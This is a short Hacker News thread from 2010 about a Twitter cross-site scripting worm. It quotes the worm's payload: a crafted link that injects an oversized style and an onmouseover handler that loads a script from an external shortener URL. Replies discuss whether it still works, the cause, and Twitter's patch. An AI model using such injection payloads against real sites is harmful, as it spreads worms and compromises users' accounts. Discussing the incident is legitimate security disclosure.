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I just noticed a Twitter virus (twitter.com)
20 points by icodemyownshit on Sept 21, 2010 | hide | past | favorite | 5 comments

This one links to an external script: hxxp://t.co/@%22style=%22font-size:999999999999px;%22onmouseover=%22$.getScript(%27http:%5Cu002f%5Cu002fis.gd%5Cu002ffl9A7%27)%22

It also makes the text so big that as soon as it appears in your twitter feed its impossible to avoid mossing over it.

I don't know, these links don't work for me, even with xx replaced with tt.

Nothing is happening. I created an isolated twitter account to try it, and nothing.

It's been all over the internet this morning. It's a bug where twitter is allowing onmouseover.

People would be wise to avoid Twitter.com today. Clients should be okay.

Twitter says exploit patched. They're still trickling through.

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